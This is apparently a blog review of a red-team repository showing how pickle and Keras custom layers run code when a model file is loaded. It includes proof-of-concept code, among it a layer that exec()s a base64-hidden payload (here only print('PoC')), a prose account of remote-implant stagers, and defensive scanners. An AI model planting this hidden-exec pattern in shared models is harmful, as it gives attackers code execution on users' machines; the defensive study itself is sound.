Weaponizing Machine Learning Models: How Pickle Deserialization Turns TensorFlow into a Trojan Horse


Hook

That innocent-looking Keras model file you just downloaded from HuggingFace? It might be executing arbitrary code on your infrastructure right now, and your security tools probably missed it.

Context

Machine learning has a trust problem that most organizations haven't acknowledged yet. As ML models become critical infrastructure—powering everything from fraud detection to content moderation—we're seeing an explosion of model sharing through platforms like HuggingFace, ModelZoo, and TensorFlow Hub. Teams download pre-trained models constantly, treating these files as benign data artifacts rather than executable code.

The 5stars217/malicious_models repository exposes a dangerous reality: ML model files can carry code that runs when they are deserialized. Several common formats store far more than weights. PyTorch checkpoints and joblib-based scikit-learn artifacts are built on Python's pickle protocol. Keras records custom layers and architectures as configuration that is turned back into live Python objects at load time, and its Lambda layers embed raw Python bytecode in that configuration. When you call keras.models.load_model(), you're not just loading weights; you may be executing Python code from an untrusted source. This project demonstrates how red teamers can weaponize this trust boundary to achieve code execution in ML pipelines, making it clear that the industry's casual approach to model security is fundamentally broken.

Technical Insight

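The attack exploits a design decision in Keras: custom components are reconstructed by running Python code at load time. Keras can't rebuild a custom layer or activation function from weights alone, so it saves the layer's class name and get_config() output, and load_model() recreates the layer by calling its from_config() classmethod, which by default passes that config straight to the constructor. Whatever the constructor does, it does during loading, and that is where the payload hides. Pickle-based formats have an equivalent hook in __reduce__: it runs when the object is saved and returns a callable plus arguments, and the unpickler calls that callable when the file is loaded.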
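Python's own pickle documentation warns that unpickling untrusted data can execute arbitrary code. The sketch below is a harmless demonstration of the __reduce__ hook described above; the class name Sneaky and the message are made up for illustration, and the built-in print stands in for attacker-chosen code.

```python
import contextlib
import io
import pickle


class Sneaky:
    """Harmless stand-in for a malicious object."""

    def __reduce__(self):
        # Called by pickle.dumps(); returns (callable, args) for the loader to invoke.
        # Built-in print stands in for attacker-chosen code.
        return (print, ("PoC: executed inside pickle.loads",))


blob = pickle.dumps(Sneaky())  # __reduce__ runs here; nothing is printed yet

captured = io.StringIO()
with contextlib.redirect_stdout(captured):
    result = pickle.loads(blob)  # the unpickler calls print(...) here

print(repr(captured.getvalue()))  # → 'PoC: executed inside pickle.loads\n'
```

The class Sneaky never appears in the pickle, only a reference to builtins.print and its argument, so the loading side needs none of the attacker's classes installed for the call to happen.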

Here's the core technique from the repository. First, create a malicious custom layer that appears legitimate:

import base64

import tensorflow as tf


class MaliciousLayer(tf.keras.layers.Layer):
    def __init__(self, units=32, **kwargs):
        # Accept name/trainable/dtype so from_config() can rebuild the layer
        super().__init__(**kwargs)
        self.units = units
        # Payload runs whenever the constructor runs, including when
        # load_model() rebuilds the layer. Harmless stand-in: the string
        # decodes to print('PoC').
        payload = base64.b64decode("cHJpbnQoJ1BvQycp")
        exec(payload)
        # Real sublayer, created once so the layer trains and predicts normally
        self.dense = tf.keras.layers.Dense(units)

    def call(self, inputs):
        # Legitimate layer logic to avoid detection
        return self.dense(inputs)

    def get_config(self):
        # Persist 'units' so the saved config can recreate this layer
        config = super().get_config()
        config.update({"units": self.units})
        return config

Here the payload is a harmless stand-in: a base64 string that decodes to print('PoC') and is passed to exec(). A weaponized sample uses the same decode-and-exec pattern to hide a stager that downloads a remote implant, writes it to disk with execute permissions, and runs it in the background, all before load_model() returns. Base64 keeps the stager's URL and commands out of naive string searches. The layer keeps functional ML logic in call(), so automated testing that validates model outputs won't flag anomalies.

The multi-stage delivery is crucial. Rather than embedding the full payload in the model file (which would bloat file size and trigger anomaly detection), the initial stage is minimal: fetch and execute. The real implant lives on attacker infrastructure and never touches the model file itself. This means signature-based scanning of the .h5 or SavedModel files might miss the threat entirely.

Building the weaponized model follows standard Keras patterns, making it virtually indistinguishable from legitimate custom models:

from tensorflow import keras
from tensorflow.keras import layers

# Build a functional model with malicious layer embedded
inputs = keras.Input(shape=(784,))
x = layers.Dense(128, activation='relu')(inputs)
x = MaliciousLayer(64)(x)  # Malicious layer looks normal
outputs = layers.Dense(10, activation='softmax')(x)

model = keras.Model(inputs=inputs, outputs=outputs)
model.compile(optimizer='adam', loss='categorical_crossentropy')

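# Legacy HDF5 save: writes the architecture as JSON (each layer's class name
# and get_config() output) plus the weights. MaliciousLayer's Python code is
# not stored in the file, and no pickling is involved.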
model.save('innocent_model.h5')

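When a victim loads this model with keras.models.load_model('innocent_model.h5', custom_objects={'MaliciousLayer': MaliciousLayer}), Keras rebuilds the layer through MaliciousLayer.from_config(), which calls the constructor, so the payload runs before load_model() returns. No further function calls or user interaction are needed. The catch is that the file records only the class name and config, not the class's code: unless the victim's environment already defines the class (through custom_objects or a registered, importable module), loading fails with an unknown-layer error. In practice the attacker must also get the Python code onto the victim's machine, for example as a helper module or notebook distributed alongside the model. Keras Lambda layers are the exception, because they serialize the wrapped function's bytecode into the model config itself. Either way, this differs from traditional file-based exploits because the victim is using the API exactly as intended.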
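The load path can be imitated in a few lines of plain Python. This is a toy model of the config round-trip, not Keras's actual code: ToyLayer, toy_save, and toy_load are hypothetical names, and the registry lookup stands in for custom_objects. It shows both halves of the behavior: the saved blob carries only a class name and config, so loading fails without a matching class, and when the class is supplied, from_config() runs the constructor during loading.

```python
import json

LOG = []  # records constructor side effects so we can see when they happen


class ToyLayer:
    """Hypothetical stand-in for a custom Keras layer."""

    def __init__(self, units=32, name=None):
        self.units = units
        self.name = name
        LOG.append(f"__init__ ran for {name}")  # a payload would sit here

    def get_config(self):
        return {"units": self.units, "name": self.name}

    @classmethod
    def from_config(cls, config):
        # Roughly mirrors the default Layer.from_config: config -> constructor
        return cls(**config)


def toy_save(layers):
    # Only class names and configs are serialized; no Python code is stored
    return json.dumps(
        [{"class_name": type(layer).__name__, "config": layer.get_config()} for layer in layers]
    )


def toy_load(blob, custom_objects=None):
    registry = dict(custom_objects or {})
    rebuilt = []
    for entry in json.loads(blob):
        cls = registry.get(entry["class_name"])
        if cls is None:
            raise ValueError(f"Unknown layer: {entry['class_name']}")
        rebuilt.append(cls.from_config(entry["config"]))
    return rebuilt


saved = toy_save([ToyLayer(64, name="dense_1")])  # constructor runs on the builder's side
LOG.clear()
try:
    toy_load(saved)  # loader without the class: nothing runs, load fails
except ValueError as exc:
    print(exc)  # → Unknown layer: ToyLayer
layers = toy_load(saved, custom_objects={"ToyLayer": ToyLayer})
print(LOG)  # → ['__init__ ran for dense_1']
```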

The repository demonstrates several payload variations: reverse shells, credential stealers, and persistence mechanisms. Each uses the same core technique but adapts the executed code. The most sophisticated version chains multiple custom components across different model layers, making static analysis harder by distributing the payload across the model architecture.
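Whether a payload sits in one custom component or is spread across several, every component still shows up by class name in the saved architecture, which can be read without loading the model. A minimal sketch, assuming a Keras-style JSON config (for legacy .h5 files Keras stores it in the root model_config attribute; for .keras archives it is config.json inside the zip). The EXPECTED_CLASSES allowlist is an illustrative assumption: real configs also tag initializers, regularizers, dtype policies, and other helper objects with a class_name, so a production allowlist needs those entries too.

```python
import json

# Illustrative allowlist only; extend it for the layers and helpers you actually use
EXPECTED_CLASSES = {
    "Functional", "Sequential", "InputLayer", "Dense", "Dropout",
    "Flatten", "Conv2D", "GlorotUniform", "Zeros",
}


def class_names(node):
    """Recursively yield every 'class_name' value in a Keras-style config tree."""
    if isinstance(node, dict):
        if "class_name" in node:
            yield node["class_name"]
        for value in node.values():
            yield from class_names(value)
    elif isinstance(node, list):
        for item in node:
            yield from class_names(item)


def review_model_config(config_json) -> dict:
    """Count Lambda layers and list unexpected classes without loading the model."""
    names = list(class_names(json.loads(config_json)))
    return {
        "lambda_layers": names.count("Lambda"),
        "unexpected_classes": sorted(set(names) - EXPECTED_CLASSES - {"Lambda"}),
    }


# Usage sketch for a legacy .h5 file (assumes h5py is installed):
#   import h5py
#   with h5py.File("innocent_model.h5", "r") as f:
#       print(review_model_config(f.attrs["model_config"]))
```

Any Lambda layer or unexpected class name is a reason to stop and review before calling load_model().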

What makes this particularly dangerous is the ecosystem context. Data scientists routinely load models in Jupyter notebooks running with elevated privileges. CI/CD pipelines pull models from artifact repositories and load them for validation. Production inference servers load models on startup. Each of these scenarios provides an attack surface, and few organizations sandbox model loading operations or validate model file integrity beyond checking that they load without errors.
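Validating integrity beyond "it loads without errors" can start with pinning a cryptographic hash of each vetted model file and checking it before any deserializer touches the bytes. This is a minimal sketch using only hashlib; the function names and the PINNED_SHA256 value in the usage comment are hypothetical. Hash pinning proves the file is the one you reviewed, not that it is safe, so it complements scanning and sandboxing rather than replacing them.

```python
import hashlib


def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large checkpoints don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_model_file(path, expected_sha256):
    """Refuse to hand a file to any deserializer unless it matches the pinned hash."""
    actual = sha256_of(path)
    if actual != expected_sha256.lower():
        raise ValueError(f"{path}: sha256 {actual} does not match pinned value {expected_sha256}")
    return path


# Usage (PINNED_SHA256 is a hypothetical value recorded when the model was vetted):
#   model = keras.models.load_model(verify_model_file("innocent_model.h5", PINNED_SHA256))
```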

Gotcha

The attack has significant limitations that reduce its real-world effectiveness, though they don't eliminate the risk entirely. Model scanners that inspect serialized code, such as pickle opcode analyzers and checks for Keras Lambda layers, flag the in-file variants of this technique, and the Python pickle protocol is well documented as unsafe. When the payload lives in accompanying Python code instead, basic static analysis can flag exec() calls, base64 decoding, or network access inside __init__ methods or __reduce__ implementations, even when the payload string itself is encoded. Organizations with mature security postures already scan for these patterns, making this a loud attack vector.
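Scanning pickle operations does not require unpickling anything: the standard pickletools module can walk the opcode stream statically. The sketch below is a simplified illustration of that idea, not a replacement for dedicated model scanners; it lists the globals a pickle imports and the opcodes that make the unpickler call something, and it deliberately ignores names fetched back from the memo.

```python
import pickle
import pickletools

# Opcodes whose argument is a str pushed onto the unpickler's stack
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
# Opcodes that make the unpickler call or instantiate something
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def scan_pickle(data: bytes):
    """Statically list imported globals and call opcodes without unpickling."""
    imports, calls, recent_strings = [], [], []
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name in STRING_OPS:
            recent_strings.append(arg)
        elif name in ("GLOBAL", "INST"):
            # Protocols 0-3 encode "module qualname" in the opcode argument
            module, qualname = arg.split(" ", 1)
            imports.append((module, qualname))
        elif name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+: module and qualname were the last two strings pushed.
            # Simplification: strings fetched back from the memo are not tracked.
            imports.append((recent_strings[-2], recent_strings[-1]))
        if name in CALL_OPS:
            calls.append(name)
    return imports, calls


class Sneaky:
    def __reduce__(self):
        return (print, ("PoC",))


print(scan_pickle(pickle.dumps(Sneaky())))                # → ([('builtins', 'print')], ['REDUCE'])
print(scan_pickle(pickle.dumps({"weights": [0.1, 0.2]})))  # → ([], [])
```

A plain weights dictionary imports nothing and calls nothing, so any imported global paired with REDUCE is a strong signal to quarantine the file.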

The attack also requires specific environmental conditions. The victim needs network access to download the second-stage payload, which fails in air-gapped ML training environments. The Python environment must have TensorFlow or Keras installed with compatible versions, limiting cross-platform portability. Unlike framework-neutral formats such as ONNX, this technique only works in Python-based ML stacks. Container-based deployment with read-only or noexec filesystems can stop the stager from writing or running its implant, even when the network fetch succeeds. Most critically, the entire attack hinges on victims loading models from untrusted sources without verification, a practice that should already be prohibited by security policy, even if enforcement is inconsistent.

Verdict

Use if: You're conducting authorized red team exercises to demonstrate ML supply chain risks to stakeholders who don't understand why model provenance matters. This tool provides concrete proof-of-concept evidence that models are code, not data, making it invaluable for security awareness training and penetration testing engagements where you need to show real exploitation paths in ML pipelines. It's also useful for security researchers developing defensive tools who need attack samples to test against.

Skip if: You're looking for stealthy, production-ready offensive tooling; this technique is too detectable and environment-dependent for serious adversarial use, and better alternatives exist for payload delivery in most scenarios. Also skip if you're not conducting authorized security work; this is strictly for defensive research and sanctioned red teaming, not unauthorized access attempts.

Organizations should use this as a wake-up call to implement model signing, restrict model sources to verified repositories, and sandbox all model loading operations rather than treating model files as trusted data.
